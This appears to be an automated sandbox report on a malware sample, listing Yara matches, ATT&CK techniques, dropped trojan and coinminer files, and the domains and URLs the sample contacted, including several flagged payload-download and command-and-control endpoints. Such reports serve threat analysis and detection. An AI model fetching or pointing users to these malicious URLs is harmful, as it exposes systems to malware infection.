Source: Yara match	File source: 0000001A.00000003.774340866.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.704153746.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.702521442.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.742156938.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.783994033.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.793329329.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aafg31.exe PID: 5060, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	14 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	3 Native API	1 Scheduled Task/Job	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Input Capture	1 Account Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	21 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Shared Modules	11 Registry Run Keys / Startup Folder	612 Process Injection	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	Automated Exfiltration	11 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Exploitation for Client Execution	1 Services File Permissions Weakness	1 Scheduled Task/Job	32 Software Packing	NTDS	147 System Information Discovery	Distributed Component Object Model	1 Input Capture	Scheduled Transfer	4 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	2 Command and Scripting Interpreter	Network Logon Script	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	681 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	125 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	1 Scheduled Task/Job	Rc.common	1 Services File Permissions Weakness	1 File Deletion	Cached Domain Credentials	341 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Masquerading	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	341 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	612 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Hidden Files and Directories	Network Sniffing	1 Remote System Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Services File Permissions Weakness	Input Capture	1 System Network Configuration Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	37%	ReversingLabs
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	100%	Avira	HEUR/AGEN.1317762
C:\Users\user\AppData\Local\Temp\oldplayer.exe	100%	Avira	HEUR/AGEN.1317762
C:\Users\user\AppData\Local\Temp\XandETC.exe	100%	Avira	HEUR/AGEN.1329655
C:\Users\user\AppData\Local\Temp\FE5F.exe	100%	Avira	HEUR/AGEN.1357339
C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\oldplayer.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\FE5F.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\C474.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\fvuiwjh	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\E640.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\C428.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\2A49.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\96DF.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\4F92.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\617B.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\A8FD.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\5274.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\rfuiwjh	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\B225.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\C523.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\48EA.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\325D.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\A08E.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\A41A.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	89%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\2A49.dll	29%	ReversingLabs	Win32.Trojan.Zusy
C:\Users\user\AppData\Local\Temp\48EA.exe	53%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\4F92.exe	26%	ReversingLabs
C:\Users\user\AppData\Local\Temp\5274.exe	45%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\617B.exe	45%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\A41A.dll	32%	ReversingLabs	Win32.Trojan.Zusy
C:\Users\user\AppData\Local\Temp\A8FD.exe	45%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\FE5F.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\XandETC.exe	71%	ReversingLabs	Win64.Coinminer.Xmrig
C:\Users\user\AppData\Local\Temp\aafg31.exe	50%	ReversingLabs	Win64.Trojan.Generic
C:\Users\user\AppData\Local\Temp\oldplayer.exe	89%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	45%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\rfuiwjh	37%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
5.42.65.80/8bmeVwqx/index.php	0%	URL Reputation	safe
https://shsplatform.co.uk/tmp/index.php	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://novanosa5org.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24Response	0%	URL Reputation	safe
http://aa.imgjeoogbb.com/check/safe	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro	0%	URL Reputation	safe
http://soryytlic4.net/	0%	URL Reputation	safe
http://aa.imgjeoogbb.com/check/?sid=80688&key=d876f5bb83b6b0cd9a921fdbc13470a1	100%	Avira URL Cloud	malware
http://aa.imgjeoogbb.com/check/?sid=80600&key=f9e4f40940f68f0d9e449d9d8966ff59	100%	Avira URL Cloud	malware
http://h170013.srv22.test-hf.su/157.exe	100%	Avira URL Cloud	malware
http://www.rs-ag.com/	0%	Avira URL Cloud	safe
https://nordskills.eu/tmp/index.php	100%	Avira URL Cloud	malware
http://www.wifi4all.nl/	0%	Avira URL Cloud	safe
https://nordskills.eu/tmp/index.php	1%	Virustotal		Browse
http://5.42.65.80/hcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQ=php	100%	Avira URL Cloud	malware
http://aa.imgjeoogbb.com/check/safehrbt	100%	Avira URL Cloud	malware
http://aa.imgjeoogbb.com/check/safebb.com/	100%	Avira URL Cloud	malware
http://aa.imgjeoogbb.com/check/?sid=80282&key=b54803441e07619a57bd24998524aa67	100%	Avira URL Cloud	malware
http://adriaenclaeys.top/412a0310f85f16ad/sqlite3.dll	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id4:/P	0%	Avira URL Cloud	safe
http://aa.imgjeoogbb.com/z2	100%	Avira URL Cloud	malware
http://aa.imgjeoogbb.com/F2P	100%	Avira URL Cloud	malware
http://aa.imgjeoogbb.com/check/safew1	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id22Response.oP	0%	Avira URL Cloud	safe
http://5.42.65.80/8bmeVwqx/index.php9	100%	Avira URL Cloud	malware
http://aa.imgjeoogbb.com/j2D	100%	Avira URL Cloud	malware
http://aa.imgjeoogbb.com/check/?sid=80396&key=e5cf6c4caa4b196832a520801c02a3fc	100%	Avira URL Cloud	malware
http://5.42.65.80/8bmeVwqx/index.php:	100%	Avira URL Cloud	malware
http://reinroot.top/calc2.exe	100%	Avira URL Cloud	phishing
http://5.42.65.80/8bmeVwqx/index.phpB	100%	Avira URL Cloud	malware
http://aa.imgjeoogbb.com/check/safe014	100%	Avira URL Cloud	malware
http://aa.imgjeoogbb.com/check/?sid=80612&key=9f850f655057a8a2a9a0f65fc8f3c6b7	100%	Avira URL Cloud	malware
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	0%	Avira URL Cloud	safe
http://aa.imgjeoogbb.com/check/safe&-)	100%	Avira URL Cloud	malware
http://aa.imgjeoogbb.com/check/?sid=80324&key=2880bf5fff517969c12d80051b7c6fd5	100%	Avira URL Cloud	malware
http://aa.imgjeoogbb.com/check/safe#5v	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
colisumy.com	175.119.10.231	true	false	high
www.tvtools.fi	104.21.88.198	true	false	high
www.fcwcvt.org	188.114.96.7	true	false	high
potunulit.org	188.114.97.7	true	false	high
www.stnic.co.uk	77.68.50.105	true	false	high
waldi.pl	46.242.238.60	true	false	high
www.jacomfg.com	96.127.180.42	true	false	high
hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com	3.130.253.23	true	false	high
evcpa.com	192.124.249.10	true	false	high
us.imgjeoigaa.com	103.100.211.218	true	false	high
www.yocinc.org	66.94.119.160	true	false	high
www.photo4b.com	195.78.66.50	true	false	high
shsplatform.co.uk	80.66.203.53	true	false	high
www.jenco.co.uk	104.21.23.9	true	false	high
www.credo.edu.pl	62.122.190.121	true	false	high
nordskills.eu	213.6.54.58	true	false	high
www.vexcom.com	104.21.55.224	true	false	high
hummer.hu	185.80.51.179	true	false	high
synetik.net	193.166.255.171	true	false	high
www.mobilnic.net	154.203.14.100	true	false	high
www.pupi.cz	103.224.182.241	true	false	high
hibu34.inregion.waas.oci.oraclecloud.net	147.154.0.23	true	false	high
www.c9dd.com	188.166.152.188	true	false	high
www.vitaindu.com	122.128.109.107	true	false	high
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com	18.119.154.66	true	false	high
aevga.com	108.167.164.216	true	false	high
greenbi.net	185.12.79.25	true	false	high
www.com-sit.com	104.26.11.81	true	false	high
www.holleman.us	51.79.51.72	true	false	high
ora.ecnet.jp	60.43.154.138	true	false	high
www.edimart.hu	81.2.194.241	true	false	high
www.wifi4all.nl	188.114.97.7	true	false	high
hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com	3.94.41.167	true	false	high
aa.imgjeoogbb.com	154.221.26.108	true	false	high
www.wnsavoy.com	96.91.204.114	true	false	high
reinroot.top	193.106.174.125	true	false	high
www.olras.com	80.93.82.33	true	false	high
ghs.googlehosted.com	172.217.16.179	true	false	high
quadlock.com	70.39.251.249	true	false	high
abart.pl	89.161.163.246	true	false	high
www.myropcb.com	74.208.236.101	true	false	high
td-ccm-168-233.wixdns.net	34.117.168.233	true	false	high
www.usadig.com	198.100.146.220	true	false	high
www.abdg.com	192.252.154.18	true	false	high
xaicom.es	188.165.133.163	true	false	high
h170013.srv22.test-hf.su	91.227.16.22	true	false	high
shops.myshopify.com	23.227.38.74	true	false	high
www.gpthink.com	39.99.233.155	true	false	high
www.speelhal.net	217.19.237.54	true	false	high
pwd.org	208.109.214.162	true	false	high
hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com	3.18.7.81	true	false	high
www.ka-mo-me.com	211.1.226.67	true	false	high
www.wkhk.net	206.191.152.37	true	false	high
api.2ip.ua	162.0.217.254	true	false	high
www.vazir.se	206.191.152.37	true	false	high
www.naoi-a.com	202.254.236.40	true	false	high
www.yoruksut.com	93.187.206.66	true	false	high
d2r2uj0bnofxxz.cloudfront.net	18.165.183.21	true	false	high
www.t-tre.com	135.181.73.98	true	false	high
www.valselit.com	193.70.68.254	true	false	high
2print.com	107.180.98.101	true	false	high
www.pr-park.com	118.27.125.181	true	false	high
www.otena.com	3.64.163.50	true	false	high
studyrussian.com	80.74.154.6	true	false	high
item-pr.com	185.15.129.58	true	false	high
www.valdal.com	172.67.73.176	true	false	high
td-ccm-neg-87-45.wixdns.net	34.149.87.45	true	false	high
www.fink.com	69.163.218.51	true	false	high
dgmna.com	192.124.249.20	true	false	high
fnw.us	137.118.26.67	true	false	high
www.rs-ag.com	188.114.97.7	true	false	high
www.mqs.com.br.cdn.gocache.net	170.82.174.30	true	false	high
www.x0c.com	104.143.9.110	true	false	high
www.nelipak.nl	82.201.61.230	true	false	high
www.findbc.com	13.248.169.48	true	false	high
www.pcgrate.com	172.67.201.26	true	false	high
d2kt7vovxa5e81.cloudfront.net	13.224.103.24	true	false	high
baijaku.com	59.106.19.204	true	false	high
www.elpro.si	172.67.70.22	true	false	high
www.ftchat.com	188.114.96.7	true	false	high
nunomira.com	192.241.158.94	true	false	high
sjbs.org	69.163.239.62	true	false	high
www.dgmna.com	unknown	unknown	false	high
www.owsports.ca	unknown	unknown	false	high
www.pdqhomes.com	unknown	unknown	false	high
www.alteor.cl	unknown	unknown	false	high
www.iamdirt.com	unknown	unknown	false	high
www.transsib.com	unknown	unknown	false	high
www.netcr.com	unknown	unknown	false	high
www.petsfan.com	unknown	unknown	false	high
www.ora.ecnet.jp	unknown	unknown	false	high
www.sjbs.org	unknown	unknown	false	high
www.fnw.us	unknown	unknown	false	high
www.synetik.net	unknown	unknown	false	high
www.medius.si	unknown	unknown	false	high
www.reglera.com	unknown	unknown	false	high
www.aevga.com	unknown	unknown	false	high
www.medisa.info	unknown	unknown	false	high
www.nqks.com	unknown	unknown	false	high
www.snugpak.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://aa.imgjeoogbb.com/check/?sid=80688&key=d876f5bb83b6b0cd9a921fdbc13470a1	true	Avira URL Cloud: malware	unknown
5.42.65.80/8bmeVwqx/index.php	true	URL Reputation: safe	low
https://shsplatform.co.uk/tmp/index.php	true	URL Reputation: safe	unknown
http://h170013.srv22.test-hf.su/157.exe	true	Avira URL Cloud: malware	unknown
https://nordskills.eu/tmp/index.php	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.rs-ag.com/	true	Avira URL Cloud: safe	unknown
http://novanosa5org.org/	true	URL Reputation: safe	unknown
http://aa.imgjeoogbb.com/check/?sid=80600&key=f9e4f40940f68f0d9e449d9d8966ff59	true	Avira URL Cloud: malware	unknown
http://www.wifi4all.nl/	true	Avira URL Cloud: safe	unknown
http://aa.imgjeoogbb.com/check/?sid=80282&key=b54803441e07619a57bd24998524aa67	false	Avira URL Cloud: malware	unknown
http://adriaenclaeys.top/412a0310f85f16ad/sqlite3.dll	true	Avira URL Cloud: safe	unknown
http://aa.imgjeoogbb.com/check/safe	false	URL Reputation: safe	unknown
http://aa.imgjeoogbb.com/check/?sid=80396&key=e5cf6c4caa4b196832a520801c02a3fc	false	Avira URL Cloud: malware	unknown
http://soryytlic4.net/	true	URL Reputation: safe	unknown
http://reinroot.top/calc2.exe	true	Avira URL Cloud: phishing	unknown
http://aa.imgjeoogbb.com/check/?sid=80612&key=9f850f655057a8a2a9a0f65fc8f3c6b7	false	Avira URL Cloud: malware	unknown
http://aa.imgjeoogbb.com/check/?sid=80324&key=2880bf5fff517969c12d80051b7c6fd5	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	325D.exe, 00000011.00000002.878802672.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.878802672.0000000004860000.00000004.00000800.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.878802672.0000000004747000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	325D.exe, 00000011.00000002.878802672.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.878802672.0000000004860000.00000004.00000800.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.878802672.0000000004747000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id12Response	325D.exe, 00000011.00000002.878802672.000000000455F000.00000004.00000800.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.2ip.ua/geo.json-	C474.exe, 00000012.00000002.668749722.0000000000597000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tempuri.org/	325D.exe, 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	325D.exe, 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21Response	325D.exe, 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json%	617B.exe, 00000008.00000002.639090518.0000000000888000.00000004.00000020.00020000.00000000.sdmp, 5274.exe, 00000019.00000002.675421792.000000000089F000.00000004.00000020.00020000.00000000.sdmp, 5274.exe, 00000019.00000003.672470751.000000000089E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json&	5274.exe, 0000001E.00000002.700521118.0000000000838000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	325D.exe, 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://5.42.65.80/hcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQ=php	oneetx.exe, 0000001D.00000002.802176864.0000000001526000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id15Response	325D.exe, 00000011.00000002.878802672.000000000460B000.00000004.00000800.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aa.imgjeoogbb.com/check/safehrbt	aafg31.exe, 0000001A.00000003.736178840.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.734810552.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.733256278.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.738384013.0000000000E64000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://aa.imgjeoogbb.com/check/safebb.com/	aafg31.exe, 0000001A.00000003.699301139.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	325D.exe, 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id4:/P	325D.exe, 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.jsonFF0x)	C474.exe, 00000012.00000002.668749722.00000000005C2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonX	5274.exe, 00000019.00000002.674898919.0000000000858000.00000004.00000020.00020000.00000000.sdmp	false		high
http://aa.imgjeoogbb.com/z2	aafg31.exe, 0000001A.00000003.711322484.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.711869962.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.2ip.ua/geo.jsonW	C474.exe, 00000012.00000002.668749722.0000000000597000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonS	E640.exe, 00000006.00000002.634735548.00000000007D7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonR	C474.exe, 00000012.00000002.668749722.0000000000597000.00000004.00000020.00020000.00000000.sdmp	false		high
http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov	explorer.exe, 00000003.00000000.568040981.00007FF883839000.00000002.00000001.01000000.00000007.sdmp	false	URL Reputation: safe	unknown
https://api.2ip.ua/geo.jsonl	C474.exe, 00000012.00000002.668749722.0000000000597000.00000004.00000020.00020000.00000000.sdmp, 5274.exe, 00000018.00000002.674169111.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	325D.exe, 00000011.00000002.878802672.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.878802672.0000000004860000.00000004.00000800.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.878802672.0000000004747000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonn	5274.exe, 00000018.00000002.674169111.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id24Response	325D.exe, 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.2ip.ua/geo.jsong	5274.exe, 0000001E.00000002.700521118.000000000085C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	325D.exe, 00000011.00000002.878802672.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.878802672.0000000004860000.00000004.00000800.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.878802672.0000000004747000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	325D.exe, 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsona	617B.exe, 00000008.00000002.639090518.0000000000888000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	325D.exe, 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json5	C474.exe, 00000012.00000002.668749722.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, C474.exe, 00000012.00000003.666539561.00000000005E0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://aa.imgjeoogbb.com/F2P	aafg31.exe, 0000001A.00000003.736178840.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.734810552.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.733256278.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.738384013.0000000000E64000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
